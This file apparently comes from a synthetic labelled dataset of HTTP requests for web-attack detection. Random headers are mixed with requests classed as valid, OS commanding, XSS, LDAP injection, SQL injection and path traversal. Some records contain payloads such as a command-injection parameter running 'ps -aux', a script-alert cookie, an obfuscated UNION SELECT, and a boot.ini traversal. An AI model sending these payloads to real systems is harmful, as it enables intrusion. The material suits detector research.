ETag: W/"Ocoimis9INXKn05DKM"
Expect: OnasoNp=phsZm
From: mhodu2@U9yLcoem.st
If-Modified-Since: Mon, 17 Mar 08 20:13:41 CET
If-Unmodified-Since: Mon, 04 May 09 08:47:27 UTC
If-Match: "PyRzpiUk41X@-k7UW3"
If-None-Match: *
If-Range: Sat, 26 Jan 08 08:13:08 UTC
Max-Forwards: 4549
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: NTLM dDNhY2RiZWVrZGVvdHlnYW50YWlJMzNpcjFpNnBvZHl4RHJydGJvdGxtNA==
Authorization: eusrb oaUM=teyle
Range: -301620,218152-35
Referer: /wu8hmqo.shtml
TE: gzip
Trailer: Date
User-Agent: Mozilla/3.2 (Windows; U; Win 9x 1.5; ce-8i; rv:6.3.9) Gecko/34488282
UA-CPU: MIPS
UA-Disp: 978,2584,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 226x0520
Via: 3.7 121.244.135.16
Transfer-Encoding: gzip
Upgrade: AajeA/4.4
Warning: 166 93.46.119.175 "apeeou6Udinzauet" "Thu, 11 Dec 08 02:46:24 UTC"
X-Forwarded-For: 129.252.117.122
X-Serial-Number: 131299472861769232
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30093
Start - Id: 12545
class: Valid
GET /AKJ.SG/FwRQOnph-Lshutdown.htm?1xeQevalxyX5I2=Yiw%2Fyatb%3Dn+lDvshy+&gtfinrfai=9417&sS=l7x&daarv8oaIn0e=ecteMe9%25rI6aE&eoecoraz=57408&dps3oeaae7Ilr=5479418860&7fbP=upsn%24rel&Gt4tegvra=im7lKPV1y5&utogrseeuthjaoc=42rux%26aiiharem%5ClN HTTP/1.0
Host: www.reYo1moTt.it:80
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: erDxio-tw2o9eT
Cache-Control: only-if-cached
Client-ip: 126.37.142.211
Cookie: fltWtnoded=ashqhaxwsa
Cookie2: $Version="568"
Date: Mon, 07 Aug 06 24:42:02 GMT
ETag: "4lKilmE9Ujh30q8CB2"
Expect: sedlo=irnMm
From: Prazsf@rlxeoeonc.fr
If-Modified-Since: Thu, 10 Jul 08 09:19:03 CET
If-Unmodified-Since: Tue, 12 Sep 06 22:04:56 CET
If-Match: "PYs41pM64REUIFAm"
If-None-Match: "G.oN.@KqLC3tb2A-Bvh"
If-Range: *
Max-Forwards: 9219
MIME-Version: 8.2
Pragma: oo=trci
Proxy-Authorization: NTLM cGVpb0FyeEkyYnRzbzg4YWllY2VrZXdmc28yaW1oMGN0dDZhZmVycjV1cmluaDY=
Authorization: Basic NmhsamF0ZTp5c3JIaXR0
Range: 79521-822865,4-
Referer: /yemjoto/myxn.mdb
TE: trailers,deflate;q=0.6,chunked
Trailer: Accept-Language
User-Agent: Mozilla/7.3 (compatible; Konqueror/1.3; WinNT; Riet0ahc7i)
UA-CPU: PowerPC
UA-Disp: 3658,3398,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 366x415
Via: FTP/9.1 www.afnng.shtml, 2.8 www.fngradlh.js
Transfer-Encoding: compress
Upgrade: AGSes/3.1
Warning: 009 www.ecnv.tiff "tiind6peciKeh3" 
X-Forwarded-For: 134.103.218.48
X-Serial-Number: 3472507595174879
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12545
Start - Id: 35006
class: Valid
POST /eT7S2U@/i4aGnheunhca/eaxMihnfitdp/bSqFjoucms/1CotT2Z0eI44A-s_nuGF/gzlVN1wfQQLa.shtml? HTTP/1.1
Content-Length: 54
Content-Language: okhnsCg
Content-Encoding: compress
Content-Location: /ehwy4/bli77ret/oh6goAoZ/m8nitbe.cgi
Content-Type: application/x-www-form-urlencoded
Host: www.tttaiQpe.biz:80
Connection: y5oec
Accept: */*;q=0.0
Accept-Charset: gb2312
Date: Sat, 19 Dec 09 05:45:10 UTC
If-Unmodified-Since: Sun, 08 Jun 08 04:40:41 GMT
Pragma: wwh='aiMu'
Referer: http://5drt.de/Soslires/iortw.htm
TE: trailers
User-Agent: olNhiulybee

4ncagon66btji=3813&u9ytotln0L4ck=61&flywd2u=1964148251

End - Id: 35006
Start - Id: 43315
class: OsCommanding
GET /c2Zt/qop5wIni1rqQc8SAQO/hP_Miz1WhrI/ivPc9j/U3sEObqWOPNF_RF.cfm?epSo6veaeecrto=384&mai=f8bane&ix=bI9J2adk4&Tg_id-alljbinidD=secatbs&pocnNvrMao=%27++%3Bps++-aux%3B&h7lZhlcqeadn=9013222&nnzuElscoosAet=nRF HTTP/1.1
Host: 254.220.255.146:80
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: esomdAs-etoe8e;q=0.5, e-chh;q=0.4, ernaab-hD0;q=0.0, hoYh082-m3gaduar;q=0.3
Cache-Control: vsse='evi'
Client-ip: 170.237.233.234
Cookie: oih2U7wa662nw=46;VfM9E.cgy=RlSo1E7|e
Cookie2: $Version="3"
Date: Fri, 20 Jun 08 16:13:59 CET
ETag: "40ys2g9rXHb@kzHexja"
Expect: 100-continue
From: ehhmnsme@ohym.uk
If-Modified-Since: Thu, 27 Oct 05 15:13:15 GMT
If-Unmodified-Since: Mon, 31 Jan 05 03:53:13 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 04 Feb 10 05:59:42 CET
Max-Forwards: 5848
MIME-Version: 7.9
Pragma: no-cache
Proxy-Authorization: NTLM aXlCUG5Zbm5ybXJ0aUZ6dG85SXdlaGVmZ2ZkaXVhZ2Rkdnlpb25saGJL
Authorization: Digest qop=mokEmOt
Range: 7-25,-90,16289-
Referer: http://de66n.gov/lsbio/inbe.js
TE: gzip;q=0.6,trailers,trailers
Trailer: Cache-Control
User-Agent: Mozilla/6.6 (Windows; U; Windows NT 1.0; eh-7n; rv:4.6.7) Gecko/45845085
UA-CPU: StrongARM
UA-Disp: 260,218,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 3321x719
Via: ewt/6.6 www.Risghrds.htm
Transfer-Encoding: tttnd
Upgrade: eCaleh/5.6, orv/6.7, AtlTSf/2.9, td7/4.6
Warning: 213 www.e6ttha.html:3574 "evi1u0aas9lO3ep" 
X-Forwarded-For: 213.135.117.46
X-Serial-Number: 0027347
----: -------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 43315
Start - Id: 4214
class: Valid
POST /fmisptifdsr5rp/Tbunion.Z-YP2R3Rfrom/apewrcTiioad/hr5bRfsVKnumDWv/ytBt/rLZ6N/eXBbVi4x2zbO0FyzF/hemdit/nhlMc5bl61I.shtml? HTTP/1.0
Content-Length: 198
Content-Language: aagteea,sttcuamr,r
Content-Encoding: gzip
Content-Location: http://www.4yz1de.st/7nftyro/324rvd/srfe91.bin
Content-MD5: cnR1aHNuYXFhcDVkZHJoOQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 13 Jul 05 01:23:03 GMT
Last-Modified: Thu, 25 Aug 05 13:55:07 CET
Host: www.EyHy2.com
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.1
Cache-Control: max-stale=57
Client-ip: 39.254.93.91
Cookie: sxjpnib4=6FiA-4Fn
Cookie2: $Version="9"
Date: Tue, 28 Jun 05 15:58:49 CET
ETag: W/"0CKOErj9WCvCxkr-"
Expect: 9yrien=mtseuw
From: hjihe3k@naahlyi3u2.ch
If-Modified-Since: Mon, 26 Mar 07 05:52:51 CET
If-Unmodified-Since: Thu, 27 Dec 07 19:40:27 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 02 Oct 08 21:34:46 CET
Max-Forwards: 7
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: er7aq Nfyivct=skgtho
Authorization: Basic c2hldGV5ZWw6RW51dU1hTDY=
Range: 2-,878-,561480-5
Referer: /anrt39hl/yb5s/S19tHssn/sa1rfsbs.txt
TE: trailers
Trailer: Transfer-Encoding
User-Agent: io6k8s3mvY http://www.MngaLe4u.org
UA-CPU: x86
UA-Disp: 505,4605,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 2347x8013
Via: 9.5 www.zanihi.js, FTP/2.5 51.125.203.131
Transfer-Encoding: 6c1eIu; norhn2=Ldht
Upgrade: hoPa/4.4, Rhih/0.5
Warning: 509 32.174.131.157 "blmx" "Mon, 22 Dec 08 02:53:51 GMT"
X-Forwarded-For: 240.213.181.129
X-Serial-Number: 1489164052019432947
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

X3dustdinBJM=30783&le=pfeebfoia4e&Lbody@BaQtKs=0&hElluueinsxy7=waB.&ndhour4pOoy=nqD_qlZ&aculNq=7&huomza=irtd&Dyu=dcsor&otssnfjawg7ewu=945&oE=openEnuopt:meeoptom]&3hn=Rrshe&ds=n&KciHnaa6ewocwl=62

End - Id: 4214
Start - Id: 16034
class: Valid
GET /fCTitmxsyitoTe54prme/gT/er8ieJuwfBQJANxwjE/kbbN/tss4bscwiNy8Aw/aeoeyayesmrulagk/aVCXCAeqo6Tg.H_SO/5ExmYYqjM9UeFJ7N2oAi/aqsh4c1EvXJuw/tat0etyhoyasnenr/pwrcpJR-VFfxz.pl? HTTP/1.1
Host: 78.116.84.164
Connection: close
Accept: */*
Accept-Charset: koi8-r;q=0.3, iso-8859-4;q=0.1
Accept-Encoding: 
Accept-Language: Aetgem-io;q=0.2, h-Xe1n, yseo-hat;q=0.7, tLeh-sstede, c4Sd-5aves;q=0.4
Cache-Control: min-fresh=12951
Client-ip: 124.71.218.216
Cookie: 4ri=dFDt4y;uo7A5dieesrCt=wuaTzWQ1i;9tadroOahhh1ee=9;soRdo=3281866473
Cookie2: $Version="6"
Date: Sun, 26 Dec 04 17:27:12 GMT
ETag: "EUyFXZhcUn.UYmSzl"
Expect: 100-continue
From: Zoa8@sriie4iwu.de
If-Modified-Since: Thu, 25 Sep 08 04:52:30 UTC
If-Unmodified-Since: Fri, 13 Nov 09 10:57:23 CET
If-Match: "YRgdJSz8WA9LFu312C"
If-None-Match: "lHDkUDBgjCM2vTZN9"
If-Range: *
Max-Forwards: 78
MIME-Version: 5.9
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: minu obeu=ntSanrz
Range: -356
Referer: /Pulr/sbgag/Mehj1oe/aeaa.htm
TE: gzip,trailers,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/9.7 (X11; U; SunOS sun4u 7.8; sx-y4; rv:7.7.3) Gecko/38712044
UA-CPU: MIPS
UA-Disp: 953,9172,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 0422x8842
Via: 7.1 155.107.205.249:146
Transfer-Encoding: deflate
Upgrade: rknlu/2.4, es1/5.2, oRAEiy/8.8
Warning: 719 224.50.125.221 "c82hsexndruzera" "Mon, 06 Jun 05 04:30:07 CET"
X-Forwarded-For: 199.28.224.223
X-Serial-Number: 0738318676103
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16034
Start - Id: 5961
class: Valid
PUT /rnectst1/7DZHDoCnph-eFQ/eAHMpMrdg79DptL/Ihtlrle9jfD9s/wMm.ke.0Ch4v84P0h/thp/iQWTbi-w0q@WAt8@VfQ/S4/scm9ttiycetoihiinsu/exjb-5pYzJ4/yzuheOo.php4? HTTP/1.0
Content-Length: 111
Content-Language: rlmcu,sr,bErdlby
Content-Encoding: gzip
Content-Location: /opmE.msf
Content-MD5: ZUloZXBxZDV1bGVpc3RxZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 08 Aug 08 04:33:37 UTC
Last-Modified: Sun, 06 Aug 06 13:21:31 CET
Host: 108.153.154.181:78509
Connection: close
Accept: */*;q=0.1
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: 94ttolrh-mhlS4;q=0.9, 0m-tohi
Cache-Control: no-cache
Client-ip: 108.65.193.61
Cookie: lblsetmtaco7=i4i;Zqllocationge@LKlZy= oreptU;n8kvntE= ]annOtepaeqsEh;wasdpc1op=m7xrG_IZ;OpsWrQ8su=t21B
Cookie2: $Version="5"
Date: Mon, 15 Nov 04 16:03:11 UTC
ETag: W/"5S52pHHf8sdHkSLb1"
Expect: 100-continue
From: Weoe@5roDnrUeua.be
If-Modified-Since: Fri, 10 Jun 05 05:54:24 CET
If-Unmodified-Since: Wed, 26 Oct 05 06:08:35 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 8756
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: xmqC 4sHflt=ecg4xa
Authorization: Basic d2ZlaTozd2FtbVVl
Range: -20,452299-,40896-379
Referer: http://www.8mhs.gov/ttssf/2rokDi/vrbcfrn/5mpi/o9sath4I.js
TE: trailers
Trailer: Via
User-Agent: Mozilla/7.6 (Machintosh; U; PPC Mac OS X 6.3; hG-hI; rv:9.0.6) Gecko/68083677
UA-CPU: StrongARM
UA-Disp: 461,413,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 457x9352
Via: HTTP/5.2 173.148.98.51:14, uyehne/4.1 www.dweid6.css:703
Transfer-Encoding: tcri; foazzre=iiyTespi
Upgrade: treana/1.3, oher5/3.1
Warning: 116 www.AsB4fE.css "ceGyewiRcegeii" "Mon, 10 Aug 09 03:15:41 CET"
X-Forwarded-For: 248.70.206.255
X-Serial-Number: 840738575772869612
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ecSoid=bt\&F@PBFB4=hruonz&xerteshed9=rS&gei31=nKzFy9j0T&fXVT=ty>ta&lbetweenKz5=Odcrhd0&ntb0tmeitdye70=75285

End - Id: 5961
Start - Id: 46746
class: XSS
GET /B5eSe/evalPDLrHallnE/y5okjZJZwnHTA/APopZsPimgN/5Py/w8DFa9opwr.pMMnRhFm/alf8si8clfwnWq/oqhF/lGEgqRS.js?zsolmszclT4=hoptrscgnpNe&mzl6TX=havingut&D2WQradminvw@CtelnetA=88761357&DU5ls=tnauer%26mHedeuw8%3Fdocument&rxx8il=8ai+eM%28xWtiframe7ebtuf HTTP/1.0
Host: 0.119.87.163
Connection: close
Accept: image/gif;q=0.4, text/xml;q=0.1
Accept-Charset: *;q=0.5
Accept-Encoding: compress, gzip;q=0.2, deflate, gzip, gzip;q=0.2
Accept-Language: *
Cache-Control: max-age=170
Client-ip: 110.139.50.204
Cookie: eEiaktstdceaeh=6likewpoomeh/n;ydstbpt4tehl=]s;ea=<script  >alert    ('tNoshnrlaeCi.s7t3')</script  >;n7ihcrd=6;D9QVgyZQ=2vPNQ3u-@
Cookie2: $Version="910"
Date: Sat, 04 Jul 09 09:05:00 GMT
ETag: "xiubSN87eRtmmb1OGP7"
Expect: 100-continue
From: eainxIo@naEeAaa.uk
If-Modified-Since: Sun, 15 Oct 06 01:31:30 UTC
If-Unmodified-Since: Wed, 30 Jul 08 10:15:33 CET
If-Match: "sKsG0DL4H7U0.hzB"
If-None-Match: *
If-Range: Sun, 07 Aug 05 21:11:28 GMT
Max-Forwards: 9875
Pragma: no-cache
Proxy-Authorization: Basic ZHp0aTozbnN0ZnFh
Authorization: Digest opaque="e2hn0"
Referer: http://www.ebgTtod.be/F7hsmh2n/nhov/uOent/rdsoet8.avi
TE: trailers,trailers,chunked;q=0.1
User-Agent: Mozilla/1.1 (X11; U; Open BSD i586 2.3; gy-hr; rv:4.8.6) Gecko/88627293
UA-OS: Win9x
UA-Pixels: 2982x284
Via: 004ost/4.1 103.42.20.56, 9.1 254.162.1.221:9816
Transfer-Encoding: zsmi; u8wle=08npu
Upgrade: ruKsng/6.7, m37/6.5
Warning: 305 www.me7rIe.js "dee5aniAheserk9leoct" 
X-Forwarded-For: 54.166.146.233
X-Serial-Number: 821528
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46746
Start - Id: 21135
class: Valid
GET /t082K90Ipgr-IF/rapstn/iL.YN9HpRVS5k07vmbC/mI.gif? HTTP/1.1
Host: www.ih7ka.be
Connection: keep-alive
Accept: video/quicktime, video/mpeg
Accept-Charset: x-mac-ce, x-mac-arabic
Accept-Encoding: compress, compress;q=0.2, gzip;q=0.0, deflate;q=0.9, gzip
Accept-Language: *
Cache-Control: min-fresh=68
Client-ip: 139.120.122.69
Cookie: anooewt2e=3571;w8s=83
Cookie2: $Version="5"
Date: Sat, 27 Aug 05 15:52:30 UTC
ETag: W/"hWRpPft4emuq-na5Rme"
Expect: tetnMsTh
From: dhehtais@ahehpggov.uk
If-Modified-Since: Tue, 28 Jul 09 08:19:34 GMT
If-Unmodified-Since: Mon, 19 Jan 04 09:25:40 CET
If-Match: *
If-None-Match: *
If-Range: Sat, 28 May 05 12:53:50 GMT
Max-Forwards: 122
MIME-Version: 9.0
Pragma: no-cache
Proxy-Authorization: NTLM OHV1MmUycm1ucHU1OGVvbjdhclIyb3RpZTJsYWVvYnI=
Authorization: Basic ZWRtZGlyZEw6bWNPb2Rl
Range: 41816-4711,961344-
Referer: /arpiv/ldsahfx/ecses.fgf
TE: trailers,trailers
Trailer: Connection
User-Agent: yn0pAV7Tf2 http://www.evanTI.biz
UA-CPU: PowerPC
UA-Disp: 595,813,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 739x758
Via: twS7/4.0 www.hwrn.tiff
Transfer-Encoding: eonr
Upgrade: olhOla/3.4, eiCcnJ/2.6, t0pcs/1.5, eshn/2.6
Warning: 738 www.hBzo7et.htm "seMl" 
X-Forwarded-For: 121.247.72.172
X-Serial-Number: 9779680
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21135
Start - Id: 38006
class: LdapInjection
GET /eararjt9nwawd/hMdOonXetsXsue2bb/zLRhZoGslbEc/dropYzP3/soa9/BfVNpMtCVuNqP/rLLp@F_bw3Dxqr5A_r.html?0Ef0sz=w%3Cntp%7Ces8&Qene7emcHM=3tg%2B%7Cx+and%3Cynzlynscriptc&eatrbe2eeee0=niDSNst&uak=tEj%29%28%26%28objectClass++++%3D+++if*%29&ttteG5Nc=3&asqs9iwhsueee=ee HTTP/1.0
Host: www.ae5or.biz
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: identity, deflate;q=0.1, identity;q=0.1, compress, gzip
Accept-Language: nubm-0Tst, o-dn, sgri-vlflTq;q=0.9
Cache-Control: no-transform
Client-ip: 41.179.118.200
Cookie: esheeezmo3=5;4SataT=oeh2raensikriolaai
Cookie2: $Version="946"
Date: Sat, 07 Nov 09 08:12:49 CET
ETag: "FpA_UeDHlRzDYzb"
Expect: 100-continue
From: Noqnil@peZa0.st
If-Modified-Since: Thu, 27 Aug 09 22:15:48 CET
If-Unmodified-Since: Fri, 15 Dec 06 09:38:44 UTC
If-Match: *
If-None-Match: "yuFYIrDhYCpRPiOVR"
If-Range: "lBALiuBRewy@DTjjqF"
Max-Forwards: 657
MIME-Version: 4.1
Pragma: no-cache
Proxy-Authorization: Digest cnonce="uskm"
Authorization: Digest response="2Efde68FAcFB3f870a1F3AfF6fFF4294"
Range: 17672-41
Referer: /isPeei/aitrhe/grlpe/rdtnuxan/onr4u.gz
TE: trailers
Trailer: Connection
User-Agent: bghpV8 http://www.ckenoi.st
UA-CPU: Sparc
UA-Disp: 8564,925,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 880x8476
Via: sotboi/1.1 www.nRba8ie4.png, 1.8 www.ouxe.gif, FTP/5.6 www.tLiue.shtml
Transfer-Encoding: deflate
Upgrade: jrr/4.9, egaar/4.0, 1Zoc/3.1, zjwo/5.8, 95o/6.0
Warning: 461 www.3izrso.tiff "rrcdd92qh0Axrii" 
X-Forwarded-For: 69.225.134.146
X-Serial-Number: 800649
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38006
Start - Id: 7410
class: Valid
PUT /eBS@0Ua/dA-tmphF9X/J-x/r@fR4r6/RyTof2/iframejASUOESKAS/T5o0Seni9AnecY/nUJSrOt22H@/i2PCwhere/uG2NijKI4Bp9ebb_/wOY/onddv84OO9QLl.js? HTTP/1.1
Content-Length: 273
Content-Language: edA,fahmd,i
Content-Encoding: deflate
Content-Location: /Teds82nl.txt
Content-MD5: aHJFcXNvbm5mdWhUYXR6dA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 04 Mar 10 05:52:11 UTC
Last-Modified: Mon, 10 Aug 09 09:36:50 GMT
Host: www.t9Aiono.st
Connection: keep-alive
Accept: application/*;q=0.5
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: m-epaAiOl, 2imenn-0e;q=0.9, rhmiiba-b;q=0.6
Cache-Control: max-stale=83
Client-ip: 7.158.25.22
Cookie: N9xgkpMnnt=4750;ncugse=323911;haurldiao6ut4i=E htacces==at4n<Cqges;imgmwJ_5VN6E=s;xNrBYGMq= kegeS;Vy4U9YIh4=o5Xe
Cookie2: $Version="688"
Date: Fri, 20 Jan 06 19:15:26 GMT
ETag: "WDPQo2By79dImmZtfm_"
Expect: 100-continue
From: lKiext@4bU5bHmi.st
If-Modified-Since: Tue, 29 Dec 09 12:24:46 UTC
If-Unmodified-Since: Sat, 08 Sep 07 22:06:06 CET
If-Match: *
If-None-Match: "m2GcRq2suyX@hECqh8Md"
If-Range: "a.B-A7qI_yIlQKsxMm"
Max-Forwards: 36
MIME-Version: 0.7
Pragma: no-cache
Proxy-Authorization: asue bpcdhTC=a83idrez
Authorization: Digest realm
Range: 12-25753
Referer: http://www.gNt7j.be/Ehsi2i/teyen/cinbee/1gra/nokne.fgf
TE: deflate
Trailer: Proxy-Authorization
User-Agent: Mozilla/0.6 (Machintosh; U; PPC Mac OS X 1.4; ee-ot; rv:5.1.8) Gecko/78565638
UA-CPU: StrongARM
UA-Disp: 3035,3287,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 9649x7067
Via: HTTP/3.8 www.9necd.html
Transfer-Encoding: gzip
Upgrade: arsv/7.3, gzM/6.6, neme/1.8, raLOwa/5.7
Warning: 382 www.s5iI.jpg "qhLcaYOza" "Tue, 01 Apr 08 22:47:56 UTC"
X-Forwarded-For: 248.139.237.35
X-Serial-Number: 896535
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

9..oXBo=807&Izailmedd=5899456629&ll9jOmyeodiq6=ekjaderte&ln=843538&ttnNh2sr=eennsecog&olehrsymOtStohn=ekgbodynA/:a0apositiondropmo&03hubtjaigU0tei=0&vih2scslerts=00836414&tcOeexA4=93&aanepsOi=if&ITLXLWcatklM@=8&frecyevArs=nStOcr1&uuagnip5Pn9St2s=23&dHTusaoTaafnsfi=tsxe

End - Id: 7410
Start - Id: 35422
class: SqlInjection
GET /zdkoahvennlli7oass/wsh/i.xSPOQDJN2Zly4/rioShlhiptnfqrec5ta/m9ouuG9S@cPRlBYvhB.html?segxmtwohk1=349&lEoetdeEeqs=nAQ1i3Hae%40io&yint=i4G-Kd&rswOo6o2anw=aisqpxlnomkoy8rn&4wonsetessreRsu=%27%29+++UN%2F**%2FION+ALL++SEL%2F**%2FECT+%27ele3xtr%27%2C317%2C11%2C%27j4tirng2%27%2C9+FROM+oAxhr+WHERE+%28++%27%27+%3D++++%27&smiccrtuQ=62&htaccesepnY3=en%3A5mlocationt%3D%2B&t3i4uehdt=e%28nchildo&eEns62eee=xTohytnimga7f&vvetmpd=rexHk&rngrnrist=ncmdel%2Be2tmpeo+est&rlMqdqscu=8nd HTTP/1.1
Host: www.27lmheasg.net:80
Connection: close
Accept: video/*
Accept-Charset: *
Accept-Encoding: *;q=0.9
Accept-Language: *
Cache-Control: no-store
Cookie: eleenitbg=ue
Date: Tue, 24 Jul 07 17:02:51 GMT
ETag: "xs@3tPvr8T.jKwZ7M6C"
Expect: edzd=keea
If-Modified-Since: Tue, 23 Mar 04 04:17:16 CET
If-Match: "PYwkduxR3xQ6IRotd-C"
If-None-Match: "6414UPycTaOr9QTdR"
If-Range: "r@1bfIIiOX1_k1qKLf"
Max-Forwards: 450
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: Basic c2lqb3c6c3lmd2hlSm8=
Authorization: NTLM cm9xZGVyb3JydW9mU2l4NElzeHJMaWVsaWwzYmF0Z2E2
Referer: /eromiP.mpeg
Trailer: TE
User-Agent: 3padysPntosbaa
UA-OS: Linux
UA-Pixels: 4111x1385
Via: 2.5 www.r7cejt.shtml, FTP/8.1 www.eSfjt.jpeg:29, ZT0e/7.6 www.nieae.css
Transfer-Encoding: hkHet; gnohn=gakvc7cs
X-Forwarded-For: 115.143.230.10
X-Serial-Number: 323144017545
----: ----------

null

End - Id: 35422
Start - Id: 36099
class: PathTransversal
GET /iy8Q/eeudmfogE.tiff?tqlejlttkewp=a%3A%5Cwindows%5Cboot.ini&ohrhghAf7=rZg&v8-qc=mhhfvadez4aa&snlwrgw3tU6rPSb=eunione HTTP/1.1
Host: www.csnBx13t.cz:0
Connection: keep-alive
Accept: image/*;q=0.4
Accept-Charset: x-mac-arabic, x-mac-icelandic, x-mac-roman;q=0.1
Accept-Encoding: *;q=0.6
Accept-Language: 9egtoae-TMEm, eyror-5SiHfh;q=0.6
Cache-Control: max-stale
Client-ip: 200.55.112.27
Cookie: ahadotoetee=0060;Ae9aT=hXx3Sc5rAjj;neuoeenieeec=eaeuhtr5a;hpo=gL.RCWJhZ4p6;tesiIhdge=Acgw 
Cookie2: $Version="7"
Date: Sun, 18 May 08 18:01:54 GMT
ETag: W/"Og53tD5Fr.sQ6S3"
Expect: tyscmrym
From: lemgP@orThcs1lso.de
If-Modified-Since: Sat, 28 Jun 08 08:56:47 GMT
If-Unmodified-Since: Tue, 16 Jan 07 01:24:24 CET
If-Match: "9D4fY42SD-lYq8pqMe"
If-None-Match: "IYfKKcGoZz4j.DmoV"
If-Range: Fri, 26 Oct 07 18:26:55 GMT
Max-Forwards: 936
MIME-Version: 3.5
Pragma: xs=t
Proxy-Authorization: NTLM aWVhbTh3ZWFleGRmaGd0cm5VMHN0ZXh2M2lnb05qdGVoZWhzdQ==
Authorization: Basic bWVjZzppdHVnb2Y=
Range: 78-
Referer: http://koranii.net/nlLlannn/maoi.pdf
TE: trailers,trailers
Trailer: If-Match
User-Agent: bcphcd/7.6.0.4
UA-CPU: Sparc
UA-Disp: 9693,338,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 6563x796
Via: FTP/1.1 www.k5ctee.htm, 7.0 120.124.161.100:0, 5.5 www.niAni.js
Transfer-Encoding: deflate
Upgrade: Fd1sk/0.3
Warning: 397 214.252.198.233:945 "AtTaftF9tdtewstae" "Tue, 11 Nov 08 15:03:35 UTC"
X-Forwarded-For: 77.201.61.163
X-Serial-Number: 5507795373725385751
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36099
Start - Id: 7677
class: Valid
PUT /3Njeap/si0irwminrnnstnhhu/tw/PWkyFGftpdtcABUO/53nsoanaspihnm/qzk.cfm? HTTP/1.0
Content-Length: 166
Content-Language: tfd
Content-Encoding: identity
Content-Location: http://rosdulca.ch/aTinst/is8iAewe/tj0sce/alqfki/0rc6.conf
Content-MD5: aG1yM3RzZXg3d1JzbW9hbA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 27 Mar 08 09:38:18 CET
Last-Modified: Mon, 01 Feb 10 08:40:03 UTC
Host: 204.119.248.255
Connection: close
Accept: image/*, audio/x-wav
Accept-Charset: *;q=0.1
Accept-Encoding: compress;q=0.8, identity, compress;q=0.1, identity
Accept-Language: tsrt8co-bnnnpdU;q=0.1, oin-i3ap0h;q=0.2, abqns-arns3eQs, hc9it-rdtshhe, n-fsn
Cache-Control: min-fresh=76537
Client-ip: 41.206.202.253
Cookie: h0aTV4V=nODc;QQ7RL06rZMexec=89;lta4fe=9
Cookie2: $Version="7"
Date: Mon, 05 Jun 06 20:29:59 CET
ETag: W/"mYhl_fvpClg4eLH"
Expect: 100-continue
From: iein@nruizurNh.it
If-Modified-Since: Wed, 10 Jan 07 11:36:51 GMT
If-Unmodified-Since: Thu, 14 Jul 05 09:21:59 UTC
If-Match: *
If-None-Match: "7.Bgxdy4Qx@rJFd2FC-"
If-Range: *
Max-Forwards: 5932
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: uocnn dT6my=esqesaq
Authorization: tteN 4Crpntob=gwrmTe
Range: 17508-,-69682,459349-
Referer: /2ituerh/rmlTIgeh/ugoAz.swf
TE: deflate;q=0.8,trailers
Trailer: Accept
User-Agent: Mozilla/8.0 (X11; U; Linux i386 7.9; bl-tN; rv:2.8.8) Gecko/62023739
UA-CPU: StrongARM
UA-Disp: 803,660,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 223x0002
Via: 8.5 www.eomiho.html:445, 5.3 www.Ue4eu.jpg, lir/3.1 www.i4con6.html
Transfer-Encoding: identity
Upgrade: reasrf/4.1
Warning: 953 www.sgtzoeOm.png:0 "musiwDeiogabd1ld" "Fri, 16 Jan 04 11:28:31 GMT"
X-Forwarded-For: 116.49.9.190
X-Serial-Number: 71188820860
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

GQmVSF=613314&Fdbtfsamd=iaccess_logtmf&insertKfIx@R9oMTy=704339735&4logW6e=yRBS-u&PtPna=54008&nu7est=0tasnaaETdokle8x&one=90900&ph1s68a4Meoeota=dcnL4BTKzv3&4d=acattsW

End - Id: 7677
